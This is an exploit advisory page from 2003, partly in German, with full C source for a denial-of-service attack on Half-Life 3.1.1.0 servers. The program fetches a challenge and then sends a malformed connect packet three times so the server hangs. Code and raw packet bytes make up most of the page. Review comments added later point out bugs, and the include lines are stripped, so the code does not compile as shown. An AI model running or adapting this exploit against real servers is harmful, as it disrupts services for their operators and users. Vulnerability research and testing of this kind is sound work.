Exploits: Half-Life Exploit Code Released + Source
Datum: 19.08.2003
--------------------------------------------------------
1. Info
2. Quelltext
--------------------------------------------------------
1. Info:
A vulnerability in Half-Life allows an attacker to cause the server to stop responding to legitimate requests by sending it malformed packets. The following exploit code can be used to test your Half-Life installation for the vulnerability.
Vulnerable systems:
* Half-Life Server 3.1.1.0 (Windows and Linux)
This is a denial-of-service exploit (if you can call this an exploit) against Half-Life servers (without WON authentication). I have tested this successfully against Half-Life servers, exe version 3.1.1.0, under SuSE Linux 7.3 and Win2k: after sending 3 specially formed connect packets the server is unresponsive and uses 100% of the CPU. This is only a fast hack; it's the result of playing around with the source code from http://www.pivx.com/luigi/. And the malformed packet is the result of a coding accident. "Auch ein blindes Huhn, findet manchmal ein Korn" — special thanks to aluigi@pivx.com. I have compiled this code successfully with VC++. With a few hits on your keyboard you can compile it under Linux too, but I have no time. Have fun with this lame code.
P.S. You must link it with WS2_32.lib!!!!!!!!!!!!!
`Delikon/5.4.03/ich@delikon.de/www.delikon.de`
Binary: at www.delikon.de
Problem description: Mail me, or look at the arrow which shows you the problem.
Patch: Hope that the Half-Life coders have time to code one, but I think this can wait until the next version of Half-Life, because this is not a serious bug (only servers without WON authentication can be crashed).
P.S. Half-Life coders: the bug is somewhere in the SV_CheckForDuplicateNames() function.
--------------------------------------------------------
2.
Quelltext:
/*
 * Proof-of-concept from the advisory above (Delikon, 2003): asks a Half-Life
 * 3.1.1.0 server for a challenge, then sends the same malformed "connect"
 * packet three times. Per the advisory, only servers running without WON
 * authentication are affected. Windows-only as written: it uses Winsock
 * (WSAStartup, SOCKET, closesocket) and Sleep(), and must be linked with
 * WS2_32.lib.
 *
 * NOTE(review): the header names after the five #include directives were
 * stripped when this page was extracted; the listing does not compile as
 * shown until they are restored.
 */
#include
#include
#include
#include
#include

/* Initialises Winsock 2.0. Returns WSAStartup's result, 0 on success
 * (main treats any non-zero value as fatal). */
int startWinsock(void) {
    WSADATA wsa;
    return WSAStartup(MAKEWORD(2,0),&wsa);
}

/* Usage: argv[1] = server IP (dotted quad, parsed by inet_addr),
 *        argv[2] = UDP port (parsed by atoi).
 * Exit status: 1 on every path, including the "success" path at the end. */
int main(int argc, char *argv[]) {
    long rc;
    SOCKET s,s2,s3,s4;
    SOCKADDR_IN addr;
    SOCKADDR_IN remoteAddr;
    char buf[256];          /* reply to the challenge request; never NUL-terminated by recvfrom */
    char challenge[256];
    int remoteAddrLen=sizeof(SOCKADDR_IN);   /* in/out length for recvfrom */
    char *connect1a;        /* head + challenge + connect1, heap-allocated below */
    /* Challenge request. Ends in an explicit \x00, so strlen(get) stops
     * there and that trailing byte is not part of what is sent. */
    char get[]="\xff" "\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c" "\x6c\x65\x6e\x67\x65\x0a\x00";
    /* Fixed prefix of the connect packet; the challenge is appended after it. */
    char head[]="\xff" "\xff\xff\xff\x63\x6f\x6e\x6e\x65\x63\x74" "\x20\x34\x36\x20";
    /* Remainder of the connect packet: quoted argument strings padded with 0x41. */
    char connect1 []= "\x20" "\x22\x5c\x70\x72\x6f\x74" "\x5c\x32\x5c\x75\x6e\x69\x71\x75\x65\x5c" "\x2d\x31\x5c\x72\x61\x77\x5c"
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41"
        "\x22" //<---the problem (author's arrow): this extra 0x22 byte, a second '"', leaves the quoted arguments unbalanced; the advisory above attributes the resulting hang to SV_CheckForDuplicateNames()
        "\x22\x20\x22\x5c\x6d\x6f\x64" "\x65\x6c\x5c\x41\x41\x41\x41\x41\x41\x41"
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
        "\x41\x41\x41\x41\x41\x41\x5c\x74\x6f\x70" "\x63\x6f\x6c\x6f\x72\x5c\x31\x32\x38\x5c" "\x62\x6f\x74\x74\x6f\x6d\x63\x6f\x6c\x6f" "\x72\x5c\x31\x32\x38\x5c\x72\x61\x74\x65" "\x5c\x39\x39\x39\x39\x2e\x30\x30\x30\x30" "\x30\x30\x5c\x63\x6c\x5f\x75\x70\x64\x61" "\x74\x65\x72\x61\x74\x65\x5c\x32\x30\x5c" "\x63\x6c\x5f\x6c\x77\x5c\x31\x5c\x63\x6c" "\x5f\x6c\x63\x5c\x31\x5c\x63\x6c\x5f\x64" "\x6c\x6d\x61\x78\x5c\x31\x32\x38\x5c\x68" "\x75\x64\x5f\x63\x6c\x61\x73\x73\x61\x75" "\x74\x6f\x6b\x69\x6c\x6c\x5c\x31\x5c\x6e" "\x61\x6d\x65\x5c\x74\x65\x73\x74\x22\x0a";
    /* NOTE(review): strlen() on an uninitialised array reads indeterminate
     * bytes (undefined behaviour) and zeroes only up to the first byte that
     * happens to be 0, so neither buffer is actually cleared here; the
     * length should be sizeof buf / sizeof challenge. */
    memset(buf,0,strlen(buf));
    memset(challenge,0,strlen(challenge));
    /* NOTE(review): the usage text prints only argv[0]; the argument
     * placeholders were presumably lost in extraction (angle brackets). */
    if (argc<3) {
        printf("\n%s \n", argv[0]);
        exit(1);
    } else {
        printf("Denial-of-Service exploit against half-life servers version 3.1.1.0\n");
        printf("Found and coded by Delikon | 7.4.03 | www.delikon.de | ich@delikon.de \n");
    }
    rc=startWinsock();
    if(rc!=0) {
        /* NOTE(review): rc is long, so the matching conversion is %ld. */
        printf("Error : startWinsock, error code: %d\n",rc);
        return 1;
    }
    s=socket(AF_INET,SOCK_DGRAM,0);
    if(s==INVALID_SOCKET) {
        printf("Error: couldn't create the socket , error code: %d\n",WSAGetLastError());
        return 1;
    }
    addr.sin_family=AF_INET;
    addr.sin_addr.s_addr =inet_addr(argv[1]);   /* no validation of the address string */
    addr.sin_port=htons(atoi(argv[2]));         /* no validation of the port; strtol would report errors */
    rc=sendto(s,get,strlen(get),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    if(rc==SOCKET_ERROR) {
        printf("Fehler: sendto, fehler code: %d\n",WSAGetLastError());
        return 1;
    }
    /* NOTE(review): the return value is not checked and no receive timeout is
     * configured on the socket, so this blocks for as long as the server
     * stays silent. A full 256-byte reply leaves buf without a terminator,
     * so the strcpy below can read past the array; a reply shorter than 14
     * bytes makes buf+14 point at uninitialised data; and a challenge
     * shorter than 3 characters makes strlen(challenge)-3 wrap, writing out
     * of bounds. */
    rc=recvfrom(s,buf,256,0,(SOCKADDR*)&remoteAddr,&remoteAddrLen);
    strcpy(challenge,buf+14);
    challenge[strlen(challenge)-3]='\0';   /* drops the last three bytes of the copied reply */
    printf("Challenge:%s\n",challenge);
    closesocket(s);
    /* sizeof(challenge) is the full 256-byte array, so the allocation is large
     * enough for head + challenge + connect1 and their terminators.
     * NOTE(review): the cast is unnecessary in C, the result is never checked
     * for NULL, and the block is never freed (the process exits below). */
    connect1a=(char *)malloc (sizeof(head)+sizeof(challenge)+sizeof(connect1));
    strcpy(connect1a,head);
    strcat(connect1a,challenge);
    strcat(connect1a,connect1);
    /* The same packet is sent three times from three fresh sockets, 120 ms
     * apart (Sleep takes milliseconds). NOTE(review): unlike s above, the
     * socket() and sendto() results for s2/s3/s4 are never checked. */
    s2=socket(AF_INET,SOCK_DGRAM,0);
    rc=sendto(s2,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    Sleep(120);
    closesocket(s2);
    s3=socket(AF_INET,SOCK_DGRAM,0);
    rc=sendto(s3,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    Sleep(120);
    closesocket(s3);
    s4=socket(AF_INET,SOCK_DGRAM,0);
    rc=sendto(s4,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    Sleep(120);
    closesocket(s4);
    /* Nothing is verified here; the message is printed unconditionally.
     * NOTE(review): WSACleanup() is never called, and the program exits with
     * status 1 even on this path. */
    printf("\n\n Server is down!!! ??? or ?? check it ;-)\n\n");
    exit(1);
}